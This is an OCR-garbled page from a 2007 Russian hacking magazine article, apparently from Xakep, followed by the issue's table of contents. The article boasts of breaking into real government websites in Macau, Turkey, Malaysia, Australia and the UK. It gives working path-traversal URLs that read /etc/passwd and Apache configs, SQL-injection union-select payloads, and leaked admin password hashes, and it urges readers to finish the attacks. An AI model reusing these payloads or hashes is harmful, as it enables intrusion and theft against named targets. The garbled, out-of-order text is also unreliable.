ÃÂœÃÂ°ÃÂ¹ - Xakep Online

More documents

Recommendations

Info

взлом Дырявое казначейство Малайзии :) Читаем файлы на сервере сиднейского руководства Ответ не заставил себя долго ждать: # Do not remove the following line, or various programs # that require network functionality will fail. 127.0.0.1 gp.macau.grandprix. gov.mo localhost localhost. localdomain gp www.macau. grandprix.gov.mo #192.168.1.28 www.macau.grandprix.gov.mo Как оказалось, на сервере крутился Linux: Linux version 2.6.17-1.2142_ FC4smp (bhcompile@hs20‐bc1- 4.build.redhat.com) (gcc version 4.0.2 20051125 (Red Hat 4.0.2-8)) #1 SMP Tue Jul 11 22:57:02 EDT 2006 И через минуту у меня в руках уже находился конфиг Апача: http://www.macau.grandprix. gov.mo/mgpc/public_html /gb/main.php?cat=news&item=mg pc&file=../../../../../../.. /../etc/httpd/conf/httpd.conf Виртуальных хостов на сервере найдено не было, зато я обнаружил полезную для себя диру: /export/home/httpuser/WebMaster/. Поиграв с параметрами, я таки выудил хэши пассов админов: http://www.macau.grandprix.gov. mo/mgpc/public_html/gb/main. php?cat=news&item=mgpc&file=.. /../../../../../../../export/ home/httpuser/WebMaster/. gppassword&id=394 Самое интересное, что тут был не один хэш: WebMaster:fk0EbenCGRXs2 phpmyadmin:d3jB0p9PyULGc admin:/ NLkH.tT7RC1c Вот тебе и админ, и веб-мастер и пхпмайадмин =). Паролики, естественно, были расшифрованы, но выкладывать я их не буду :). Все в твоих руках. Кстати, админка лежит тут: www.macau.grandprix.gov.mo/admin. Продолжаем двигаться дальше. Следующие на очереди — турки. Честно говоря, мне никогда не нравился турецкий андеграунд с обилием кидисов. Поэтому от вида турецкого ресурса, находящегося в правительственной доменной зоне, во мне сразу проснулся азарт =). Сам линк на сайт был таким: www.atam.gov.tr. Побродив по ссылкам, я наткнулся на инъекцию: http://www.atam.gov.tr/index.php? Page=DergiIcerik&IcerikNo=-1%27 Скрипт index.php работал с базой и был подвержен sql-инъекции, что не могло не радовать :). Поиграв с конструкцией «order by», я таки узнал количество полей: http://www.atam.gov.tr/index. php?Page=DergiIcerik&IcerikNo=- 1+order+by+5/* Как выяснилось, данные со второго и пятого полей отображались: http://www.atam.gov.tr/index. php?Page=DergiIcerik&IcerikNo=- 1+union+select+1,2,3,4,5/* К сожалению, на мою попытку получить доступ к mysql.users база ругнулась и выдала лишь: «Access denied for user: 'atamDB@localhost' to database 'mysql'». Название одной таблички я знал: DergiIcerik. Также я знал и названия полей в ней: No, TRBaslik, TRYazar, TRDergiSayi, TRIcerik. Но ничего полезного там не обнаружилось. Прав file_priv тоже не было, и все попытки прочитать какой-либо из файлов на сервере были тщетны. Но когда я глянул версию MySQL, мое лицо расплылось в улыбке: http://www.atam.gov.tr/index. php?Page=DergiIcerik&IcerikNo=- 1+union+select+1,version(),3,4, 5+from+DergiIcerik/* На сервере крутился «мускул» версии 4.0.26. Как и с чем его едят, думаю, разберешься и без меня — я и так тебе уже многое сказал =). Так, кто там на очереди? Ах, Малайзия, а я уж и забыл :). Между прочем, не сайтец, а золото, почти в прямом смысле. Спешу представить тебе официальный ресурс казначейства Министерства финансов Малайзии: www.treasury.gov.my. Кстати, дизайн у этого портала достаточно качественный, чего не скажешь о движке. Достаточно прогуляться по следующему линку, чтобы в этом убедиться: http://www.treasury.gov.my/ index.php?ch=36&pg=126&ac=1830 %27 «Так, кто там на очереди? Ах, Малайзия, а я уж и забыл :). Между прочим, не сайтец, а золото, почти в прямом смысле» / 076 xàêåð 05 /101/ 07
взлом Бажный ресурс в зоне .gov.tr «Совершенно случайно мне на глаза попался один из их ресурсов в зоне .gov.uk, и тот оказался бажным» В качестве ответа — пустой лист, что говорит об error_reporting(0) и, следовательно, о слепой инъекции. Ну да это нам не помеха :). Если ты читал мою статью в «Хакере» под названием «Недетский взлом» (февраль, 2007), то уже наверняка понял, что к чему. Полей оказалось всего 11: Что-то мне подсказывает, что у малазийского казначейства могут возникнуть нехилые проблемы =). Только смотри не шали сильно — как показывает практика, шутки могут закончиться плохо. Ну а мы тем временем перемещаемся в сторону солнечной Австралии. Гм, а что ты вообще знаешь об Австралии? :) Кенгуру, теннис, пляжи? =) Слабовато, а ведь там еще и бажные ресурсы в зоне .gov.au есть :). Сильно углубляться не будем, поэтому коротко и по делу. Первый наш клиент — Департамент туризма и искусства Тасмании, а второй — сиднейское руководство чего-то там. Ресурс Департамента туризма Тасмании выглядит даже очень неплохо, правда только снаружи: www.bicentenary.tas.gov.au. Двиг написан на PHP, а сама бага лежит практически на поверхности: http://www.bicentenary.tas.gov. au/page.php?id=-1+order+by+15/* Великобритании. Совершенно случайно мне на глаза попался один из их ресурсов в зоне .gov.uk, и тот оказался бажным. Урл портала: www.monitor-nhsft.gov.uk. Чтобы ты сильно не мучался, намекну, что уязвим скрипт publications.php, инъекция раскручивается через нефильтруемый параметр cat: http://www.treasury.gov.my/ index.php?ch=36&pg=126&ac=1830% 27+order+by+11/* Но что самое интересное, в этом же скрипте не фильтровалась еще одна переменная — $pg. Результат тот же: http://www.treasury.gov.my/index. php?ch=37&pg=129%27+order+by+11/ *&ac=1892&lang=eng xàêåð 05 /101/ 07 / Причем тут можно наблюдать и ответ «мускула». Например, поменяв в верхнем запросе циферку 15 на 16, получим ожидаемый результат: MySQL Error: 1054 (Unknown column '16' in 'order clause') Суть баги понятна, так что флаг тебе в руки =). Что касается сиднейского руководства чего-то там, то его портал порадовал своим дырявым перловым движком. Сам домен имеет адрес www.sca.nsw.gov.au. А уязвимость кроется в скрипте textversion.pl. В общем виде это выглядит так: http://www.sca.nsw.gov.au/cgibin/textversion/textversion. pl?conf=conf.xml&file=../../../../ etc/passwd Очень солидно смотрится бага, просто супер =). Маленькая подсказка: конфиг веб-сервера лежит неподалеку, но на самом сервере интересного мало. Вот такие дела, еще раз передаю привет солнечной Австралии =). И в заключение скажу пару слов о http://www.monitor-nhsft.gov.uk/ publications.php?cat=-1' Полей всего 19: http://www.monitor-nhsft.gov. uk/publications.php?cat=-1+unio n+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19/* А версия «мускула» — 4.1.16 =). Как говорится, без комментариев. Постскриптум Надеюсь, что после прочтения моей статьи все твои иллюзии о несокрушимости правительственных ресурсов развеются. Любой взлом — это, в первую очередь, дело времени и желания. Проблема лишь в том, что, связавшись с подобными серверами, ты непременно наживешь себе лишний геморрой. Я не зря не раскручивал до конца описанные баги. Тебе тоже не советую это делать. Не надо трогать государство, тем более свое — оно может укусить, очень больно укусить.z 077
Page 1:
МАй 05(101) 2007 22 секрет
Page 4 and 5:
meganewS 004 MegAneWS Все нов
Page 6:
meganews Дмитрий Трави
Page 10:
meganews Гибридим теле
Page 14:
meganews Уникальное пр
Page 17 and 18:
meganews Макинтоши тож
Page 19 and 20:
476 $140 $195 >> ferrum mSi nx7600g
Page 21 and 22:
S T T I C H T Y U B B E S T B U Y B
Page 24 and 25:
ferrum $45 $85 razer deathadder К
Page 26 and 27:
pc_zone кРис кАспеРски
Page 28 and 29: pc_zone DVD На диске теб
Page 30: pc_zone Пересчет CRC В з
Page 33 and 34: pc_zone секрета Google По
Page 35 and 36: pc_zone http:// Многочисл
Page 37 and 38: pc_zone Несколько борд
Page 39 and 40: pc_zone FAR хранит списо
Page 41 and 42: pc_zone Папка Recent хран
Page 43 and 44: implant Готовый височн
Page 45 and 46: implant Нервы височной
Page 48 and 49: implant Дейтерий трити
Page 50 and 51: implant Германский ток
Page 52 and 53: implant компенсируетс
Page 54 and 55: взлом кРис кАспеРс
Page 56 and 57: взлом ANI-формат: уда
Page 58 and 59: взлом анимированны
Page 60 and 61: взлом M3lC1Y / m3lc1y@bk.ru, h
Page 62: взлом i Пользуясь с
Page 65 and 66: взлом var sock = new java.net.
Page 67 and 68: взлом Внешний вид п
Page 69 and 70: взлом Настройки Googl
Page 72 and 73: взлом леониД «R0id» с
Page 74: взлом ! Внимание! Ин
Page 77: взлом Хэши админск
Page 81 and 82: взлом Возможности
Page 83 and 84: взлом Пример: «select"u
Page 85 and 86: взлом «Три девицы п
Page 88 and 89: взлом Маг / mag@wapp.ru / I
Page 90 and 91: взлом Msn-аккаунты IM-
Page 92 and 93: взлом леониД «CR@WleR»
Page 94 and 95: взлом DVD На нашем DVD
Page 96 and 97: взлом Леонид «R0id» С
Page 98 and 99: сцена Мария «Mifrill»
Page 100: сцена 10240-процессор
Page 103 and 104: сцена DVD Команда HITB'
Page 105 and 106: сцена Хакер - офици
Page 108 and 109: сцена ильЯ АлексАн
Page 110 and 111: unixoid Сергей «grinder» Я
Page 112 and 113: unixoid Установка новы
Page 114 and 115: unixoid Крис Касперски
Page 116 and 117: unixoid Консольная вер
Page 118 and 119: unixoid Linux в гостях у Fr
Page 120 and 121: unixoid i Для тех отваж
Page 122 and 123: coding АнДРей «littleBUddA»
Page 124 and 125: coding Несколько слов
Page 126 and 127: coding Deeoni$ / DeeoniS@gmail.com
Page 128 and 129:
coding RegMon показывает,
Page 130 and 131:
coding боРис вольфсон
Page 132 and 133:
coding Вот так будет в
Page 134 and 135:
coding Крис Касперски
Page 136 and 137:
креатиff meganews /134
Page 138 and 139:
креатиff meganews расте
Page 140 and 141:
units сТепАн «Step» иль
Page 142:
РЕДАКЦИОННАЯ ПОДПИ
Page 145 and 146:
units magazine@real.xakep.ru не
Page 147 and 148:
Íàäåæíûé ñòîðîæåâî
Page 149 and 150:
ХАКЕР.PRO Настройки
Page 151 and 152:
ХАКЕР.PRO Выбор типа
Page 153 and 154:
ХАКЕР.PRO Синхрониза
Page 155 and 156:
ХАКЕР.PRO на. Его рек
Page 157 and 158:
ХАКЕР.PRO Использова
Page 159 and 160:
ХАКЕР.PRO Активные с
Page 161 and 162:
ХАКЕР.PRO Внутри дом
Page 165:
2007 x 05(МАЙ)101 101
show all

ÃÂœÃÂ°ÃÂ¹ - Xakep Online

Create successful ePaper yourself

Delete template?

Save as template?

ÃÂœÃÂ°ÃÂ¹ - Xakep Online